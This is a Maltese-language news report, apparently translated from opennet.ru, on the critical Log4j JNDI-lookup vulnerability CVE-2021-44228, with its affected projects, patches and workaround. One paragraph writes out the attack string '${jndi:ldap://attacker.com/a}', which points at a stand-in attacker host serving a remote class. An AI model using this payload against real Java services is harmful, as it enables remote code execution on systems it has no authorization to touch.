F'Apache Log4j, qafas popolari għall-organizzazzjoni tal-illoggjar fl-applikazzjonijiet Java, ġiet identifikata vulnerabbiltà kritika li tippermetti li jiġi esegwit kodiċi arbitrarju meta valur ifformattjat apposta fil-format “{jndi:URL}” jinkiteb fil-log. L-attakk jista 'jsir fuq applikazzjonijiet Java li jirreġistraw valuri riċevuti minn sorsi esterni, pereżempju, meta juru valuri problematiċi f'messaġġi ta' żball.
Huwa nnutat li kważi l-proġetti kollha li jużaw oqfsa bħal Apache Struts, Apache Solr, Apache Druid jew Apache Flink huma affettwati mill-problema, inklużi Steam, Apple iCloud, klijenti u servers ta 'Minecraft. Huwa mistenni li l-vulnerabbiltà tista 'twassal għal mewġa ta' attakki massivi fuq applikazzjonijiet korporattivi, li tirrepeti l-istorja ta 'vulnerabbiltajiet kritiċi fil-qafas Apache Struts, li, skond stima approssimattiva, tintuża f'applikazzjonijiet tal-web minn 65% ta' Fortune 100 kumpanija. Inklużi tentattivi biex jiġu skennjati n-netwerk għal sistemi vulnerabbli.
Il-problema hija aggravata mill-fatt li sfruttament tax-xogħol diġà ġie ppubblikat, iżda s-soluzzjonijiet għall-fergħat stabbli għadhom ma ġewx ikkompilati. L-identifikatur CVE għadu ma ġiex assenjat. It-tiswija hija inkluża biss fil-fergħa tat-test log4j-2.15.0-rc1. Bħala soluzzjoni għall-imblukkar tal-vulnerabbiltà, huwa rakkomandat li l-parametru log4j2.formatMsgNoLookups jiġi stabbilit għal veru.
Il-problema kienet ikkawżata mill-fatt li log4j jappoġġja l-ipproċessar ta 'maskri speċjali "{}" fil-linji output lejn il-log, li fih setgħu jiġu esegwiti mistoqsijiet JNDI (Java Naming and Directory Interface). L-attakk jinżel biex jgħaddi string bis-sostituzzjoni “${jndi:ldap://attacker.com/a}”, malli jiġi pproċessat liema log4j se jibgħat talba LDAP għall-mogħdija għall-klassi Java lis-server tal-attacker.com . Il-mogħdija rritornata mis-server tal-attakkant (per eżempju, http://second-stage.attacker.com/Exploit.class) se tkun mgħobbija u eżegwita fil-kuntest tal-proċess attwali, li jippermetti lill-attakkant jesegwixxi kodiċi arbitrarju fuq il- sistema bid-drittijiet tal-applikazzjoni attwali.
Addendum 1: Il-vulnerabbiltà ġiet assenjata l-identifikatur CVE-2021-44228.
Addendum 2: Ġie identifikat mod kif tiġi evitata l-protezzjoni miżjuda bir-rilaxx log4j-2.15.0-rc1. Aġġornament ġdid, log4j-2.15.0-rc2, ġie propost bi protezzjoni aktar kompleta kontra l-vulnerabbiltà. Il-kodiċi jenfasizza l-bidla assoċjata man-nuqqas ta 'terminazzjoni anormali fil-każ ta' użu ta 'URL JNDI ifformattjat ħażin.
Sors: opennet.ru